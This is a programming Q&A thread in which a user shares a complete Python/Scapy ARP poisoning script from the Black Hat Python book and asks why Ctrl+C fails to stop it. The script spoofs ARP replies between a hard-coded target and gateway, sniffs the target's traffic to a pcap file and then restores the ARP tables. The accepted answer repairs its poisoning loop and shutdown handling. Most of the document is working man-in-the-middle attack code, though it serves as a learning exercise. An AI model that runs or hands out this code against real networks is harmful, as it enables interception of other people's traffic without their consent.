# ArpPoisoning With Python , BlackHat Book

Tags: python, python-2.7, arp

i tried to write an arppoisoning program , based on blackhat python book!
and it works fine , and every thing works greate , but when i want to stop the program with ctrl+c the keybordinterrupt exception doesnt work !
and i thing my restore target run 2times, because it print "[*] Restoring target" is shown 2time !
here is my entire code :

```
from scapy.all import *
import os
import sys
import threading
import signal


interface = raw_input("Enter Interface name :> ")
target_ip = "192.168.43.180"
gateway_ip = "192.168.43.1"
packet_count = 10

conf.iface = interface
conf.verb = 0

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
    print "[*] Restoring Target..."
    send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)
    os.kill(os.getpid(),signal.SIGINT)

def get_mac(ip_address):
    responses , unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
    for s,r in responses :
        return r[Ether].src
    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Begining ARP Poisoning:"
    while True:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)

    print ".:ARP poison Attack Finished:."
    return


print ".: Setting Up %s :." % interface
gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "Failed to Get Gateway MAC..."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" %(gateway_ip,gateway_mac)
target_mac= get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

poison_thread = threading.Thread(target = poison_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print " \n[*] Start snifing for %d Packets \n" %packet_count
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)
    wrpcap('arper.pcap',packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)
```

Comment: Why don't you use ctrl + break, instead making keyboard interruption event?

Comment: it doesnt matter , when my program gets to the restoretarget method , it shows eror in os.kill(os.getpid(),signal.SIGINT) !

Answer (score 1, accepted):

Ok, I had the same problem.

The problem is the `while True` loop in the `poison_target` function: this loop never exits.

After reviewing the downloadable code you will notice some slight differences from the code in the book. In particular, the author uses the `poisoning` global and a `finally` clause in the main error handling:

```
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    '''poison'''
    global poisoning
    --snip--
    print '[*] Begining the ARP poison. [CTRL-C to stop]'
    while poisoning:
        send(poison_t)
        send(poison_g)
        time.sleep(2)
    print '[*] ARP poison attack finished.'
    return
```

Then in the main code:

```
--snip--
poisoning = True
poison_thread.start()
try:
    --snip--
    packets = sniff(count=count, filter=bpf_filter, iface=interface)
except KeyboardInterrupt:
    pass
finally:
    --snip--
    poisoning = False

    time.sleep(2)

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    --snip--
```